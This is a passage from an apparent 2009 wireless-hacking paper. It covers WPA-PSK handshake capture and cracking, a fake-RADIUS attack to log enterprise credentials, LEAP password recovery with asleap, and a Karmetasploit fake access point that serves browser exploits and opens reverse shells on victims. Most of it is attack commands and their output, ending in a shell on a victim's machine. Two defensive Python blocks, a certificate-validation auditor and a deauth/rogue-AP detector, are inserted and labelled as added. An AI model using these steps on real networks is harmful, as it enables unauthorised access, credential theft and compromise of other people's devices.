	#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
	21:56:47  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
	21:56:47  Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]

	We assume that we captured this process into the workshop capture file. So, we perform the cracking with aircrack-ng.

	#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap

A successful result looks like the following.
--------------------------------------------------------------------------------
Opening test-02.cap
Read 252 packets.

   #  BSSID              ESSID                     Encryption

   1  xx:xx:xx:xx:xx:xx  Workshop                   WPA (1 handshake)

Choosing first network as target.

Opening workshop-02.cap
Reading packets, please wait...


                                 Aircrack-ng 1.0 rc1 r1085


                   [00:00:00] 0 keys tested (0.00 k/s)


                        KEY FOUND! [ TheFuckinWPAKey ]


      Master Key     : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
                       E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63

      Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
                       61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
                       9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
                       2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1

      EAPOL HMAC     : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
--------------------------------------------------------------------------------

This result shows that the WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey".


#############################################################
 [0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
#############################################################

	Most companies have turned to public key encryption (certificate-based EAP) on their wireless networks and believe
it is perfectly safe. But a tricky attacker can still attack this setup by spoofing the certificate.

This attack takes advantage of client carelessness. Many clients accept a certificate without checking whether it
is the genuine one or not. This lets the attacker impersonate the RADIUS server and log the credentials the victims
send to it.

We can use FreeRADIUS as the fake RADIUS server, combined with the WPE patch, which adds logging of the credentials
received by the FreeRADIUS server.

Additional information: http://www.willhackforsushi.com/FreeRADIUS_WPE.html
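The mitigation is on the client side: validate the RADIUS server certificate against a pinned CA and match the server name, otherwise the spoofed certificate is accepted. The following added example (not from this paper or from FreeRADIUS-WPE) audits wpa_supplicant network blocks for EAP profiles that lack ca_cert or a server-name match; the configuration text is constructed, the option names are real wpa_supplicant keys.

```python
import re

# Constructed wpa_supplicant.conf fragment: one weak profile and one hardened profile.
SAMPLE_CONF = """
network={
    ssid="corp-weak"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="s3cret"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="corp-ok"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="s3cret"
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
"""

# Options that tie the server certificate to a specific name (real wpa_supplicant keys).
NAME_CHECKS = {"domain_suffix_match", "domain_match", "subject_match", "altsubject_match"}

def parse_networks(text):
    """Return each network={...} block as a dict of option -> value (quotes stripped)."""
    nets = []
    for body in re.findall(r"network=\{(.*?)\}", text, re.S):
        opts = {}
        for line in body.splitlines():
            line = line.strip()
            if "=" in line and not line.startswith("#"):
                key, value = line.split("=", 1)
                opts[key.strip()] = value.strip().strip('"')
        nets.append(opts)
    return nets

def audit(text):
    """Map each EAP profile's SSID to the list of certificate-validation gaps it has."""
    findings = {}
    for net in parse_networks(text):
        if "EAP" not in net.get("key_mgmt", "") or net.get("eap") not in ("PEAP", "TTLS", "TLS"):
            continue                                   # PSK or non-TLS profile: out of scope
        gaps = []
        if "ca_cert" not in net:
            gaps.append("no ca_cert: any server certificate is accepted")
        if not NAME_CHECKS & net.keys():
            gaps.append("no server-name match: any certificate from that CA is accepted")
        findings[net.get("ssid", "?")] = gaps
    return findings
```

A profile with ca_cert but no name match is still flagged, because with a public CA any certificate that CA issued would pass.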


################################
 [0x09] - Exploiting CISCO LEAP
################################

	Cisco's proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate security vulnerabilities 
by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the Extensible Authentication Protocol (EAP) 
types specified by 802.1X.
	
	LEAP is easy to implement and contains compelling features such as: 
	- Mutual Authentication
	- User-Based Authentication
	- Dynamic WEP Keys

	We found that the username sent to the RADIUS server is plaintext when captured with Wireshark, while the password was encrypted, so it is also vulnerable to exploitation...


	asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords. asleap can perform:

	- Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from a live capture
	- Deauthentication of clients on a LEAP WLAN (speeding up LEAP password recovery); the AirJack driver is required

	Download Here: http://asleap.sourceforge.net/

	First, use genkeys (shipped with asleap) to produce the required database (.dat) and index (.idx) files:
	
	#./genkeys  -r  dict  -f  dict.dat  -n  dict.idx

	dict = Our wordlist/dictionary file, with one word per line
	dict.dat = Our new output pass+hash file (generated as a result of running this command)
	dict.idx = Our new output index filename (generated as a result of running this command)


	#./genkeys -r dictionary -f dict.dat -n dict.idx
	
	-----------------------------------------------------------------------
	genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
	Generating hashes for passwords (this may take some time) ...Done.
	3 hashes written in 0.2 seconds:  122.67 hashes/second
	Starting sort (be patient) ...Done.
	Completed sort in 0 compares.
	Creating index file (almost finished) ...Done.
	-----------------------------------------------------------------------
	
	The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx files:

	#./asleap  -r  data/leap.dump  -f  dict.dat  -n  dict.idx

	leap.dump = Our libpcap packet capture file (note: any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
	dict.dat = Our pass+hash file (generated with genkeys, see above)
	dict.idx = Our index file (generated with genkeys, see above)
	
	#./asleap -r data/leap.dump -f dict.dat -n dict.idx

	-----------------------------------------------------------------------
	asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
	Using the passive attack method.

	Captured LEAP exchange information:
		username:	qa_leap
		challenge:	0786aea0215bc30a
		response:	7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
		hash bytes:	4a39
		NT hash:	a1fc198bdbf5833a56fb40cdd1a64a39
		password:	qaleap
	Closing pcap ...
	-----------------------------------------------------------------------

	Note: the success rate depends on the dictionary size; the password is only recovered if it is in the wordlist.

	asleap 2.2 adds the "-C" and "-R" options, which take the challenge and the response (respectively) as hex-delimited bytes. With these options asleap becomes a generic MS-CHAPv2 cracking tool and can be applied whenever an MS-CHAPv2 packet capture is available.
		

##########################################
 [0x10] - Mass Exploit with Karmetasploit
##########################################

	HD Moore released some documentation (http://trac.metasploit.com/wiki/Karmetasploit) to get karmetasploit working with the framework.

	Karmetasploit can launch a fake AP and exploit the clients that connect to it. The attacker can log cookies, FTP and HTTP traffic, credentials and so on 
	from the client, and can also exploit browser vulnerabilities on the client machine.

	This method was tested on BackTrack 3 (Final).

	1. Update Aircrack-NG
		
		$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng 
		$ make
		# make install

	2. Let's run the aireplay-ng test to see if things are working (your Wi-Fi card must support packet injection)

		bt# aireplay-ng -9 wlan0

		15:10:21 Trying broadcast probe requests...
		15:10:21 Injection is working!
		15:10:25 Found 5 APs

		15:10:25 Trying directed probe requests...
		15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
		15:10:35 0/30: 0%

		15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
		15:10:42 0/30: 0%

		15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
		15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
		15:10:48 5/30: 60%
		15:10:48 Injection is working!

		15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
		15:56:53 0/30: 0%


	  Now injection works!!

	3. Update Metasploit

		$ svn co http://metasploit.com/svn/framework3/trunk msf3
	
	4. Download the Bash script from http://www.darkoperator.com/kmsapng.tgz
		
		The script will do the following:
		- Change the MAC address of the interface
		- Set the Interface in Monitor Mode
		- Start the Karma AP with Airbase-ng
		- Change the MTU Size for the interface
		- Set the IP
		- Start the DHCPD server
		- Set an iptables redirect of all traffic to itself, so as to bypass cached DNS entries
		- Start Metasploit. 

	5. After that we run kmsapng.sh like this:

	#./kmsapng.sh -i wlan0 -m km -s linksys
	
	Changing MAC Address
	Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
	Faked MAC:   00:40:1b:5b:b0:0b (Printer Systems Corp.)
	starting fake ap
	This will take 15 seconds ..............
	DHCPD started successfully
	Starting Packet capture to /root/kms.cap
	Starting Metasploit
	
	                                  _
	                                 | |      o
	_  _  _    _ _|_  __,   ,    _  | |  __    _|_
	/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
	  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
	                           /|
	                           \|
	
	=[ msf v3.2-release
	+ -- --=[ 304 exploits - 124 payloads
	+ -- --=[ 18 encoders - 6 nops
	=[ 79 aux
	
	resource> load db_sqlite3
	[*] Successfully loaded plugin: db_sqlite3
	resource> db_create /root/karma.db
	[*] The specified database already exists, connecting
	[*] Successfully connected to the database
	[*] File: /root/karma.db
	resource> use auxiliary/server/browser_autopwn
	resource> setg AUTOPWN_HOST 172.16.1.207
	AUTOPWN_HOST => 172.16.1.207
	resource> setg AUTOPWN_PORT 55550
	AUTOPWN_PORT => 55550
	resource> setg AUTOPWN_URI /ads
	AUTOPWN_URI => /ads
	resource> set LHOST 172.16.1.207
	LHOST => 172.16.1.207
	resource> set LPORT 45000
	LPORT => 45000
	resource> set SRVPORT 55550
	SRVPORT => 55550
	resource> set URIPATH /ads
	URIPATH => /ads
	resource> run
	[*] Starting exploit modules on host 172.16.1.207...
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
	[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
	[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
	[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
	[*] Server started.
	[*] Started reverse handler
	[*] Server started.
	[*] Using URL: http://0.0.0.0:55550/ads
	[*] Local IP: http://127.0.0.1:55550/ads
	[*] Server started.
	[*] Auxiliary module running as background job
	resource> use auxiliary/server/capture/pop3
	resource> set SRVPORT 110
	SRVPORT => 110
	resource> set SSL false
	SSL => false
	resource> run
	[*] Server started.
	[*] Auxiliary module running as background job
	resource> use auxiliary/server/capture/pop3
	resource> set SRVPORT 995
	SRVPORT => 995
	resource> set SSL true
	SSL => true
	resource> run
	[*] Server started.
	[*] Auxiliary module running as background job
	resource> use auxiliary/server/capture/ftp
	resource> run
	[*] Server started.
	
	...
	...
	
	[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
	[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)
	
	msf auxiliary(http) > sessions -i 2
	[*] Starting interaction with 2...
	
	Microsoft Windows XP [Vesion 5.1.2600]
	(C) Copyright 1985-2001 Microsoft Corp.
	
	D:\Mozilla Firefox> cd ..
	
	D:\net user
	
	User accounts for \\CWH
	
	-------------------------------------------------------------------------------
	__vmware_user__          Administrator            ASPNET
	Guest                    HelpAssistant            IUSR_CWH
	IWAM_CWH                 CWH                      SUPPORT_388945a0
	The command completed successfully.
	
	
	Enjoy the pwnage!! Oops, for pentest :p
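	The defender's view of two of the techniques in this paper, as an added example that is not part of the original: a passive monitor over raw 802.11 management frames that flags the burst of deauthentication frames used to force the four-way handshake (section 0x07) and a KARMA-style AP that answers probe requests for any SSID (section 0x10). All frames, MAC addresses and SSIDs are constructed, and the alert thresholds are assumptions.

```python
import struct
from collections import Counter, defaultdict

def mgmt(frame):
    """(subtype, addr1, addr2, addr3, body) for an 802.11 management frame, else None."""
    if len(frame) < 24 or ((frame[0] >> 2) & 3) != 0:      # frame-control type 0 = management
        return None
    return frame[0] >> 4, frame[4:10], frame[10:16], frame[16:22], frame[24:]

def ssid_of(body):
    """SSID element (tag 0) of a probe response: 12 fixed bytes, then tagged elements."""
    i = 12
    while i + 2 <= len(body):
        tag, ln = body[i], body[i + 1]
        if tag == 0:
            return body[i + 2:i + 2 + ln].decode("utf-8", "replace")
        i += 2 + ln
    return None

def analyse(frames, deauth_limit=10, ssid_limit=5):
    """Return (deauth floods per (bssid, station), BSSIDs answering for many SSIDs)."""
    deauths, ssids = Counter(), defaultdict(set)
    for f in frames:
        m = mgmt(f)
        if m is None:
            continue
        sub, a1, a2, bssid, body = m
        if sub in (10, 12):                                 # disassociation / deauthentication
            sta = a1 if a2 == bssid else a2                 # aireplay-ng -0 spoofs both directions
            deauths[(bssid.hex(":"), sta.hex(":"))] += 1
        elif sub == 5:                                      # probe response
            s = ssid_of(body)
            if s is not None:
                ssids[bssid.hex(":")].add(s)
    return ({k: n for k, n in deauths.items() if n >= deauth_limit},
            {b: sorted(s) for b, s in ssids.items() if len(s) >= ssid_limit})

# Constructed frames standing in for a capture (addresses and SSIDs are made up).
def deauth(dst, src, bssid, reason=7):
    return bytes([0xC0, 0]) + b"\x3a\x01" + dst + src + bssid + b"\0\0" + struct.pack("<H", reason)

def probe_resp(dst, bssid, ssid):
    ie = bytes([0, len(ssid)]) + ssid.encode()
    return bytes([0x50, 0]) + b"\0\0" + dst + bssid + bssid + b"\0\0" + b"\0" * 12 + ie

AP, STA, ROGUE = (bytes.fromhex(h) for h in ("020000000001", "020000000002", "02000000000f"))
SAMPLE = [deauth(STA, AP, AP) for _ in range(32)] + [deauth(AP, STA, AP) for _ in range(32)]
SAMPLE += [probe_resp(STA, AP, "WORKSHOP")]                # a normal AP answers only for its own SSID
SAMPLE += [probe_resp(STA, ROGUE, s) for s in ("linksys", "WORKSHOP", "CITEC", "attwifi", "Free WiFi", "home")]
FLOODS, KARMA = analyse(SAMPLE)                            # FLOODS: 64 deauths; KARMA: ROGUE with 6 SSIDs
```

A single BSSID replying with probe responses for unrelated SSIDs is the signature of the "-s linksys" style fake AP above, while the 64 directed deauth frames match the count aireplay-ng reports when forcing a handshake.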
		

#####################
 [0x11] - References
#####################

[1] PaulDotCom Forum
[2] http://www.darkoperator.com/scripts
[3] http://trac.metasploit.com/wiki/Karmetasploit
[4] http://aircrack-ng.org/doku.php
[5] http://www.citec.us
[6] http://www.milw0rm.com


####################
 [0x12] - Greetz To
####################
	
Greetz	    : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com

				----------------------------------------------------
	This paper is written for educational purposes only. The authors are not responsible for any damage 
 originating from using this paper for a wrong objective. If you want to use this knowledge on other people's systems, 
				you must request consent from the system owner first.
				----------------------------------------------------

# milw0rm.com [2009-02-24]